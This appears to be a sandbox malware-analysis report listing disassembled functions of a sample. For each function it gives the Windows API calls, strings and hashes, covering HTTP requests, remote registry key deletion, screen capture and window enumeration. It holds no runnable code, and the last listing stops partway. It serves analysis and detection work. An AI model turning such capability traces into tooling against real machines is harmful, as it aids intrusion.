                                                  • Instruction Fuzzy Hash: D9F18C315083419FDB24EF24C895BAEBBE6BF85310F18855DF4958B2A2DB31EC45CB52
                                                  Function 0059326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetMenuItemCount.USER32(00661990), ref: 005D2F8D
                                                  • GetMenuItemCount.USER32(00661990), ref: 005D303D
                                                  • GetCursorPos.USER32(?), ref: 005D3081
                                                  • SetForegroundWindow.USER32(00000000), ref: 005D308A
                                                  • TrackPopupMenuEx.USER32(00661990,00000000,?,00000000,00000000,00000000), ref: 005D309D
                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005D30A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                  • String ID: 0
                                                  • API String ID: 36266755-4108050209
                                                  • Opcode ID: eb2f579ec46729b19681de17b3cbfb54b518539887af6f79c90803dfba143d57
                                                  • Instruction ID: 63c7be68607026fff1a2f1cb37b05d12d1879e67edaccd97c18c09968db800de
                                                  • Opcode Fuzzy Hash: eb2f579ec46729b19681de17b3cbfb54b518539887af6f79c90803dfba143d57
                                                  • Instruction Fuzzy Hash: FD71E571644206BAEB318F68CC49FAABF69FF45364F204217F515AA2E0C7B1A910DB91
                                                  Function 00626CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(?,?), ref: 00626DEB
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00626E5F
                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00626E81
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00626E94
                                                  • DestroyWindow.USER32(?), ref: 00626EB5
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00590000,00000000), ref: 00626EE4
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00626EFD
                                                  • GetDesktopWindow.USER32 ref: 00626F16
                                                  • GetWindowRect.USER32(00000000), ref: 00626F1D
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00626F35
                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00626F4D
                                                    • Part of subcall function 005A9944: GetWindowLongW.USER32(?,000000EB), ref: 005A9952
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                  • String ID: 0$tooltips_class32
                                                  • API String ID: 2429346358-3619404913
                                                  • Opcode ID: b3f8a4fa57887dd5b262e7ca736065d0cb26f420e4d5aa90a6443109e6e59b72
                                                  • Instruction ID: 61f65487fe06fc13504f4d3940753a20cfba44430f50a59be91f269cdf84479c
                                                  • Opcode Fuzzy Hash: b3f8a4fa57887dd5b262e7ca736065d0cb26f420e4d5aa90a6443109e6e59b72
                                                  • Instruction Fuzzy Hash: A9716674104645AFDB21CF18EC48FAABBFAFB89314F18451DF98997261C770A90ACF12
                                                  Function 0060C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0060C4B0
                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0060C4C3
                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0060C4D7
                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0060C4F0
                                                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0060C533
                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0060C549
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0060C554
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0060C584
                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0060C5DC
                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0060C5F0
                                                  • InternetCloseHandle.WININET(00000000), ref: 0060C5FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                  • String ID:
                                                  • API String ID: 3800310941-3916222277
                                                  • Opcode ID: 40c68088cef33f53fa0b1c39e7716c9addf7c160dbe30508a001821e7c3d353c
                                                  • Instruction ID: 364fb42bd341d61e0b8ba9e76fd4e44e90921ed237584f1b2636c97b0b1a5105
                                                  • Opcode Fuzzy Hash: 40c68088cef33f53fa0b1c39e7716c9addf7c160dbe30508a001821e7c3d353c
                                                  • Instruction Fuzzy Hash: DD518EB4540604BFDB368F60CD48AAB7BFEFF08364F004619F94596290DB30E915DBA0
                                                  Function 0062856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00628592
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 006285A2
                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 006285AD
                                                  • CloseHandle.KERNEL32(00000000), ref: 006285BA
                                                  • GlobalLock.KERNEL32(00000000), ref: 006285C8
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006285D7
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 006285E0
                                                  • CloseHandle.KERNEL32(00000000), ref: 006285E7
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 006285F8
                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0062FC38,?), ref: 00628611
                                                  • GlobalFree.KERNEL32(00000000), ref: 00628621
                                                  • GetObjectW.GDI32(?,00000018,000000FF), ref: 00628641
                                                  • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00628671
                                                  • DeleteObject.GDI32(00000000), ref: 00628699
                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006286AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                  • String ID:
                                                  • API String ID: 3840717409-0
                                                  • Opcode ID: 95b404e06f66a1aa8aa6b1f4685ac2613bc209b83ce5f5e4a2c3a86b59e36bb1
                                                  • Instruction ID: c91e0c96a2a0ca32de153ddc38e8d9e712759003762e621cf9941a948fb959e0
                                                  • Opcode Fuzzy Hash: 95b404e06f66a1aa8aa6b1f4685ac2613bc209b83ce5f5e4a2c3a86b59e36bb1
                                                  • Instruction Fuzzy Hash: 2141FC75601615AFDB21DF65DC48EAE7BBAEF89761F104058F905E7250DB30AA02CF60
                                                  Function 006014BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(00000000), ref: 00601502
                                                  • VariantCopy.OLEAUT32(?,?), ref: 0060150B
                                                  • VariantClear.OLEAUT32(?), ref: 00601517
                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 006015FB
                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00601657
                                                  • VariantInit.OLEAUT32(?), ref: 00601708
                                                  • SysFreeString.OLEAUT32(?), ref: 0060178C
                                                  • VariantClear.OLEAUT32(?), ref: 006017D8
                                                  • VariantClear.OLEAUT32(?), ref: 006017E7
                                                  • VariantInit.OLEAUT32(00000000), ref: 00601823
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                  • API String ID: 1234038744-3931177956
                                                  • Opcode ID: 441202173b166958359b85e59ba970a3705a91a5d0fab81757f3c05669ad0e57
                                                  • Instruction ID: 93ed0f4c43fd6a8796f4425e39b349d1a43955f77043864314725430ea73e60e
                                                  • Opcode Fuzzy Hash: 441202173b166958359b85e59ba970a3705a91a5d0fab81757f3c05669ad0e57
                                                  • Instruction Fuzzy Hash: FAD118B1A40506DBDB199F64D889BBEBBB6BF86700F10805AF4069F2C0DB30DC46DB61
                                                  Function 0061B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                    • Part of subcall function 0061C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061B6AE,?,?), ref: 0061C9B5
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061C9F1
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA68
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA9E
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061B6F4
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0061B772
                                                  • RegDeleteValueW.ADVAPI32(?,?), ref: 0061B80A
                                                  • RegCloseKey.ADVAPI32(?), ref: 0061B87E
                                                  • RegCloseKey.ADVAPI32(?), ref: 0061B89C
                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0061B8F2
                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0061B904
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 0061B922
                                                  • FreeLibrary.KERNEL32(00000000), ref: 0061B983
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0061B994
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 146587525-4033151799
                                                  • Opcode ID: e0883bf367e2728065231304d2df160041d0234e2e9f2e0572d5726b3fd75e75
                                                  • Instruction ID: 7fa150cbfe4cca87347df064fc1d0afcd6b6c1e7a83e753a5b595b6c77360c48
                                                  • Opcode Fuzzy Hash: e0883bf367e2728065231304d2df160041d0234e2e9f2e0572d5726b3fd75e75
                                                  • Instruction Fuzzy Hash: F5C17031204202AFD710DF24C495FAABBE6BF85318F18955CF45A4B3A2CB75ED86CB91
                                                  Function 0061255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 006125D8
                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 006125E8
                                                  • CreateCompatibleDC.GDI32(?), ref: 006125F4
                                                  • SelectObject.GDI32(00000000,?), ref: 00612601
                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0061266D
                                                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 006126AC
                                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 006126D0
                                                  • SelectObject.GDI32(?,?), ref: 006126D8
                                                  • DeleteObject.GDI32(?), ref: 006126E1
                                                  • DeleteDC.GDI32(?), ref: 006126E8
                                                  • ReleaseDC.USER32(00000000,?), ref: 006126F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                  • String ID: (
                                                  • API String ID: 2598888154-3887548279
                                                  • Opcode ID: 43e6f365c57b5cdcc194d3ad57ff010194e88956cb7e854697f9543223394fce
                                                  • Instruction ID: 0567dcb9497614b6b5015656793c0e1f120ff8241df2a09374f25998400afa00
                                                  • Opcode Fuzzy Hash: 43e6f365c57b5cdcc194d3ad57ff010194e88956cb7e854697f9543223394fce
                                                  • Instruction Fuzzy Hash: FE610275D0021AEFCF14CFA4D885AAEBBF6FF48310F248529E955A7250D730A951CFA4
                                                  Function 005CDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 005CDAA1
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD659
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD66B
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD67D
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD68F
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6A1
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6B3
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6C5
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6D7
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6E9
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6FB
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD70D
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD71F
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD731
                                                  • _free.LIBCMT ref: 005CDA96
                                                    • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                                                    • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
                                                  • _free.LIBCMT ref: 005CDAB8
                                                  • _free.LIBCMT ref: 005CDACD
                                                  • _free.LIBCMT ref: 005CDAD8
                                                  • _free.LIBCMT ref: 005CDAFA
                                                  • _free.LIBCMT ref: 005CDB0D
                                                  • _free.LIBCMT ref: 005CDB1B
                                                  • _free.LIBCMT ref: 005CDB26
                                                  • _free.LIBCMT ref: 005CDB5E
                                                  • _free.LIBCMT ref: 005CDB65
                                                  • _free.LIBCMT ref: 005CDB82
                                                  • _free.LIBCMT ref: 005CDB9A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 29406ed0793761367eefcfd10d582729a4fd44a28e3146a5e8fd1a6ade1a5490
                                                  • Instruction ID: a23ae44a02533aaf8df29e70ad1b5493e994412dbab989d08e7f27661db10db5
                                                  • Opcode Fuzzy Hash: 29406ed0793761367eefcfd10d582729a4fd44a28e3146a5e8fd1a6ade1a5490
                                                  • Instruction Fuzzy Hash: 183117316046069FEB21AAB9EC49F5ABFE9FF40325F15442DE449D7191DA35AC808B30
                                                  Function 005F365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 005F369C
                                                  • _wcslen.LIBCMT ref: 005F36A7
                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 005F3797
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 005F380C
                                                  • GetDlgCtrlID.USER32(?), ref: 005F385D
                                                  • GetWindowRect.USER32(?,?), ref: 005F3882
                                                  • GetParent.USER32(?), ref: 005F38A0
                                                  • ScreenToClient.USER32(00000000), ref: 005F38A7
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 005F3921
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 005F395D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                  • String ID: %s%u
                                                  • API String ID: 4010501982-679674701
                                                  • Opcode ID: f276ee59fcda7d06997a03fb487e7b502eb6c73a7834db67c7cabb56dd7ac258
                                                  • Instruction ID: bab4b2c8c9f82ff3e480f9149d9d06ab5993d599416d2fa44437bb27aa66fe10
                                                  • Opcode Fuzzy Hash: f276ee59fcda7d06997a03fb487e7b502eb6c73a7834db67c7cabb56dd7ac258
                                                  • Instruction Fuzzy Hash: 4691D77120560AAFE719DF24C885FFAFBA9FF44350F004519FA99C2190DB78EA45CB91
                                                  Function 005F4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 005F4994
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 005F49DA
                                                  • _wcslen.LIBCMT ref: 005F49EB
                                                  • CharUpperBuffW.USER32(?,00000000), ref: 005F49F7
                                                  • _wcsstr.LIBVCRUNTIME ref: 005F4A2C
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 005F4A64
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 005F4A9D
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 005F4AE6
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 005F4B20
                                                  • GetWindowRect.USER32(?,?), ref: 005F4B8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                  • String ID: ThumbnailClass
                                                  • API String ID: 1311036022-1241985126
                                                  • Opcode ID: 689bdbe4d7226e85ba27c117fafea35b9a21bbb7b5cdcab52b035fa66400e43b
                                                  • Instruction ID: 44075fc8164f928a387ffaa2db2858e867ea7fc4c7324f28f5214a396115260f
                                                  • Opcode Fuzzy Hash: 689bdbe4d7226e85ba27c117fafea35b9a21bbb7b5cdcab52b035fa66400e43b
                                                  • Instruction Fuzzy Hash: 64919C3110420A9FDB14CF14C985BBB7BA9FF84354F048469FE859A096EB38ED45CFA1
                                                  Function 0061CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0061CC64
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0061CC8D
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0061CD48
                                                    • Part of subcall function 0061CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0061CCAA
                                                    • Part of subcall function 0061CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0061CCBD
                                                    • Part of subcall function 0061CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0061CCCF
                                                    • Part of subcall function 0061CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0061CD05
                                                    • Part of subcall function 0061CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0061CD28
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 0061CCF3
                                                  Strings
                                                  Memory Dump Source
